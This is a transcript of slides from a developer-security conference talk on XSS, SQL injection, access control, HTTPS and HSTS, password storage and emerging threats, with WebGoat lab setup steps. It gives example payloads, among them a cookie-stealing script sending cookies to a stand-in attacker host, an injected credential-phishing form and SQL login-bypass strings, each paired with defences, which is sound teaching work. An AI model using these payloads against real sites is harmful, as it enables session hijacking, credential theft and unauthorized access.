devbeat conference - developer first security
DESCRIPTION
Topics include: - Sample and Demo of Top Application Risks — Cross Site Scripting, SQL Injection, Access Control - Who’s Monitoring Your Traffic? — Encrypting in Transit Secure Data Storage & Protection — Correct Password -Storage & Data Protection -Growing Threats Plaguing ApplicationsTRANSCRIPT
![Page 1: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/1.jpg)
Developer-first security Integrating Security into
Development
Michael Coates !
[email protected] michael-coates.blogspot.com
@_mwc
![Page 3: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/3.jpg)
Reality
![Page 4: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/4.jpg)
“The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine”
h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/
!
![Page 5: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/5.jpg)
Data Loss & Breaches
Verizon Data Breach Report 2013datalossdb.org
![Page 6: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/6.jpg)
Outside Attackers
Verizon Data Breach Report 2013datalossdb.org
![Page 7: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/7.jpg)
Security - Into The Details• Sample and Demo of Top Application Risks
— Cross Site Scripting, SQL Injection, Access Control
• Who’s Monitoring Your Traffic?— Encrypting in Transit
• Secure Data Storage & Protection — Correct Password Storage & Data Protection
• Growing Threats Plaguing Applications
![Page 8: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/8.jpg)
WARNING
Security Testing is
ILLEGAL ON UNAUTHORIZED SYSTEMS
![Page 9: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/9.jpg)
Cross Site Scripting SQL Injection Access Control
3 Dangerous Vulnerabilities
![Page 10: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/10.jpg)
What are Web Requests
• Open console & enter the following: telnet google.com 80GET / HTTP/1.1
• Hit return 2 times
![Page 11: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/11.jpg)
Cross Site Scripting (XSS)• Problem: User controlled data returned in HTTP
response contains HTML/JavaScript code
• Impact: Session Hijacking, Full Control of Page, Malicious Redirects
• Basic XSS Test: " ><script>alert(document.cookie)</script>
• Cookie Theft Example: "><script>document.location='http://attackersite/ '+document.cookie</script>
![Page 12: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/12.jpg)
XSS Behind The Sceneshttp://shinypage.com?user=Bob
<div>Glad to see you <b>Bob</b></div>HTML Source
<h1>Glad to see you <%= request.getParameter("name") %></h1>JSP Code
Rendered HTML
![Page 13: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/13.jpg)
XSS Behind The Scenes
http://shinypage.com?user=friend</b><br><form method=”post”
action=”badsite.com/login”> Login: <input type="text"
name="username"><br> Password:<input type="password"
name="password"><input type="submit" value="Submit" /></form>
![Page 14: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/14.jpg)
XSS - Injecting HTML
Rendered HTML
![Page 15: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/15.jpg)
Cross Site Scripting• Cross Site Scripting typically uses JavaScript to
do bad things
• Steal session cookies <script>alert(document.cookie)</script>
• Redirect to bad pages <script>window.location = "http://evilsite.com/"</script>
• Rewrite page on the fly
![Page 16: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/16.jpg)
Lab! - Reflected XSS
![Page 17: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/17.jpg)
Reflected XSS Lab• Lesson: Cross-Site Scripting->Reflected
XSS Attacks
• Proxy Not Needed
![Page 18: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/18.jpg)
Lab! - Stored XSS
![Page 19: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/19.jpg)
Stored XSS Lab• Lesson: Cross-Site Scripting-
>Stored XSS Attacks
• Proxy Not Needed
![Page 20: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/20.jpg)
XSS Prevention• Solution
1. Output Encoding - converts command characters to benign characters for display 2. Input Validation
< > “ ‘ &
< >
"e; ' &HTML Encoding
<h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1>
![Page 21: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/21.jpg)
XSS Attempt Revisited
http://shinypage.com?user=friend</b><br><form method=”post”
action=”badsite.com/login”> Login: <input type="text"
name="username"><br> Password:<input type="password"
name="password"><input type="submit" value="Submit" /></form>
![Page 22: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/22.jpg)
Safe Handling
Glad to see you friend</b> <br><form method="post" action="badsite.com/
login"> Login: <input type="text" name="username"><br>
Password:<input type="password" name="password"><input type="submit" value="Submit" /></form>
Rendered HTML
![Page 23: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/23.jpg)
XSS Resources
• OWASP XSS Prevention Cheat Sheet - http://bit.ly/XSS-OWASP
• Content Security Policy - http://bit.ly/CSP-OWASP
• OWASP XSS Overview - http://bit.ly/OWASPXSS
![Page 24: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/24.jpg)
SQL Injection• Problem: User controlled data improperly used with SQL
statements
• Impact: Arbitrary SQL Execution, Data Corruption, Data Theft
• Basic SQL Injection Tests:OR 1=1 --' OR '1'= '1'--
• Example Vulnerable Query:sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
![Page 25: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/25.jpg)
Lab! - SQL Lesson
![Page 26: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/26.jpg)
SQL Injection• Lesson: Injection Flaws ->
Lab: SQL Injection -> Stage 1: String SQL Injection
• Proxy Needed
• Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
![Page 27: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/27.jpg)
SQL Injection
• HTTP Postemployee_id=112&password=x' OR ‘1'='1 &action=Login
• Vulnerable SQLSelect user from UserTable where name= '+username+ ' and pass = '+password+ ‘
• Resulting StatementSelect user from UserTable where name= '112' and pass = 'x' OR '1'='1'
• Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
![Page 28: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/28.jpg)
SQL Injection
• Parameterized QueriesNo confusion with control characters Example: would look for password of ‘ or ‘1’=’1
• Input Validation Are special characters needed for most fields?What about non-printable characters %00-%0A?
![Page 29: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/29.jpg)
SQL Injection Resources
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
![Page 30: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/30.jpg)
Access Control• Problem: Developers assume some parts of app can’t be seen,
tampered with or invoked by the user
• Impact: Unauthorized data access, access to privileged functionality
• Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments
• Access Control Failure Example:!
• http://somebadbank.com/showacct?id=101
• http://somebadbank.com/showacct?id=102
![Page 31: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/31.jpg)
Lab! - Access Control
![Page 32: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/32.jpg)
Access Control Violation• Lesson: Access Control Flaws-
>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control
• Proxy Needed
• Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
![Page 33: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/33.jpg)
Access Control Violation• Hint: Login with Tom and perform available
actions (search staff, view profile). Figure out how action name is sent to server
POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost !employee_id=105&action=ViewProfile
![Page 34: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/34.jpg)
Strong Access Controls• Access Control Performed Server Side
• Never Relies Upon “Security by Obscurity”
• Be Careful with Identifiers (e.g. id=123)
• Attacker Can Send Anything in Request
• Presentation Layer Controls Can Not Enforce Access Control
![Page 35: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/35.jpg)
Access Control Resources
• https://www.owasp.org/index.php/Access_Control_Cheat_Sheet
![Page 36: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/36.jpg)
Who’s Monitoring Your Traffic?
![Page 37: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/37.jpg)
Insecure Session Management
• Secure login over HTTPS
• Password submitted encrypted
• Immediate redirect to HTTP
• Session ID sent cleartext <-- vulnerability point
https://site.com/login
http://site.com/profile
![Page 38: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/38.jpg)
Vulnerable Redirects• User requests HTTP page, response redirects
HTTPS
• 302 Response is HTTP <-- Vulnerability Point
![Page 39: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/39.jpg)
Secure Design for Communication
• Use HTTPS Throughout Web Site!
• HTTP Strict Transport Security (HSTS)!
• Opt-in security control
• Website instructs compatible browser to enable STS for site
• HSTS Forces (for enabled site):
• All communication over HTTPS
• No insecure HTTP requests sent from browser
• No option for user to override untrusted certificates
![Page 40: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/40.jpg)
Strict Transport Security• Browser prevents HTTP requests to HSTS site
• Any request to site is “upgraded” to HTTPS
• No clear text HTTP traffic ever sent to HSTS site
• Browser assumes HTTPS for HSTS sites
![Page 41: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/41.jpg)
Secure Data Storage & Protection
![Page 42: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/42.jpg)
Password StorageBad Approaches!
• Your own algorithm
• md5
• sha1
• encryption
• base64 encoding
• rot 13
Good Approach!
• Bcrypt
• PBKDF2
+ Per User Salt
![Page 43: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/43.jpg)
What Are We Protecting?Correct password hashing protects against:!
• Offline attacks of password repository
• Brute Force, Rainbow Attacks
!
!
!
Does not address:!
Guessing easy passwords
Password theft, disclosure
Session Hijacking
Credential Stuffing
![Page 44: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/44.jpg)
Architecture for Sensitive Data
https://site.com internal SSL
web server database
Monitor Database Queries &
Response Size
![Page 45: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/45.jpg)
Encrypting Sensitive Data in Database
databaseCustomer/Group Encryption Key
User Data
Key Encrypting Key
Encrypted [Customer/Group Encryption Key]
Decrypt
Encrypt
Encryption within Database Unique keys per data regionKey encrypting keys Hardware Security Modules (
Hardware Security Module
![Page 46: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/46.jpg)
Growing Threats Plaguing Applications
![Page 47: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/47.jpg)
Denial of ServiceDenial of Service (DOS)
Distributed Denial of Service (DDOS)
![Page 48: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/48.jpg)
Denial of Service
Application Layer DDOSNetwork DDOS
site.com/generateReport
Exhaust Network!Bandwidth
Exhaust Server !CPU/Memory
![Page 49: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/49.jpg)
Application Denial of Service
Traditional Network DDOS !
• overwhelms target with volume
• exhausts bandwidth / capacity of network devices
• Requires large number of machines
• Defenses: CDN, anti-DDOS services
Application DDOS !
• invokes computationally intense application functions
• exhausts CPU / memory of web servers
• Requires few machines
• Defenses: Few available, must customize
![Page 50: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/50.jpg)
Credential Stuffing
compromised! server!
Stolen Credentials!joe: abc123!sue: password1!bob: MyP0n3y
joe: abc123
https://site.com/login!
sue:password1
Credentials!joe: abc123!sue: password1!bob: MyP0n3y
![Page 51: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/51.jpg)
Take Aways• Understand top security threats and anticipate
potential malicious use of application to design secure code
• Multiple controls possible to protect sensitive data in transit and storage
• Understand emerging threats to plan for appropriate defenses
• Use OWASP BWA Security Lab and learn more!
![Page 52: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/52.jpg)
Thanks!
http://michael-coates.blogspot.com
@_mwc
![Page 53: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/53.jpg)
Virtual Security Training Lab Setup
![Page 54: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/54.jpg)
Software
• Vulnerable Server: OWASP’s Webgoat
• Proxy Tool - OWASP’s ZAP (Zed Attack Proxy)
• Browser
• Virtual Machine: OWASP Broken Web App VM
![Page 55: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/55.jpg)
Test Connectivity to VM1.Open Browser
2.Browse to your VM ip (listed in VM login page)
• e.g. http://192.168.56.101
3.Should see OWASP BWA welcome page
4.Error? Check ip address of VM
![Page 56: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/56.jpg)
WebGoat
• Click First Link - OWASP WebGoat version 5.3.x
• Username / Password is guest / guest
![Page 57: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/57.jpg)
Understanding the Proxy• Proxy is middle-man between browser and web
server
• Assists with traffic manipulation & inspection
Web Proxy Web ServerAttacker’s Browser
![Page 58: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/58.jpg)
VMPrimary OS
Understanding the Proxy
Web Proxy Web ServerBrowser
Your Computer
![Page 59: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/59.jpg)
Enabling Proxy
1.Open ZAP
2.Configure Firefox to use proxy
3.Resend Request
4.Confirm received by proxy
5.Forward to web server (vm)
![Page 60: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/60.jpg)
Using A Proxy• ZAP - Configure to listen on 8080
![Page 61: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/61.jpg)
Set Firefox Proxy• Set Firefox proxy to 8080
• Preferences -> Advanced -> Network -> Settings
• Set HTTP Proxy
• Important - clear “No Proxy for” line
![Page 62: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/62.jpg)
Confirm Setup Works
• Refresh Web Browser
• Go to ZAP
• See site in left-hand column
![Page 63: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/63.jpg)
Intercepting Traffic• Add a “breakpoint” by right clicking on the page and choosing
“Break...”
!
!
!
!
• Refresh the webpage - it will hang
• Modify the request as needed, then press the “Continue” button
![Page 64: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/64.jpg)
“Hello World” of Proxies• Lesson: General->Http Basic
• Objective:
• Enter your name into text box
• Intercept with proxy & change entered name to different value
• Receive response & observe modified value is reversed
Web Proxy Web ServerAttacker’s Browser
Joe Sue
euSeuS